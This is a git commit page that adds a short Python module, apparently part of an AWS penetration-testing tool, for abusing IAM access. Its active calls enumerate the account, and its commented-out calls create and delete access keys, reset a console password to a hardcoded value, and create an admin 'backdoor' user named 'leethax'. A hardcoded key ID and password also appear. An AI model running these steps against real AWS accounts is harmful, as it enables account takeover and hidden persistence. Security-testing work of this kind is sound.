looks legit to me (trying to make sure we can load all files in the modules directory as well as libs but do it in a somewhat abstracted way. Although, the method to do the abstraction then requires duplicate code so I am sort of annoyed that I used dup code to avoid making dup code... whatever... get over it you neurotic ginger.)
This commit is contained in:
cktricky
18
modules/iam_pwn.py
Normal file
18
modules/iam_pwn.py
Normal file
@@ -0,0 +1,18 @@
|
||||
'''
|
||||
if you have root or IAM access gather user info, manipulate access keys or passwords, make backdoor account
|
||||
'''
|
||||
from libs.iam import *
|
||||
from libs.sts import *
|
||||
from config import AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY
|
||||
|
||||
|
||||
def step_cg_test():
|
||||
get_accountid(AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY)
|
||||
check_root_account(AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY)
|
||||
get_password_policy(AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY)
|
||||
#create_access_key(AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY,'pythons3')
|
||||
#delete_access_key(AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY,'pythons3', 'AKIAIJV3RQMOYM7WQS2Q')
|
||||
#change_user_console_password(AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, 'pythons3', 'PS#EDCasd123456!@')
|
||||
#create_user(AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY,'leethax')
|
||||
#make_admin(AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY,'leethax')
|
||||
#make_backdoor_account(AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY,'leethax','PS#EDCasd123456!@')
|
||||
Reference in New Issue
Block a user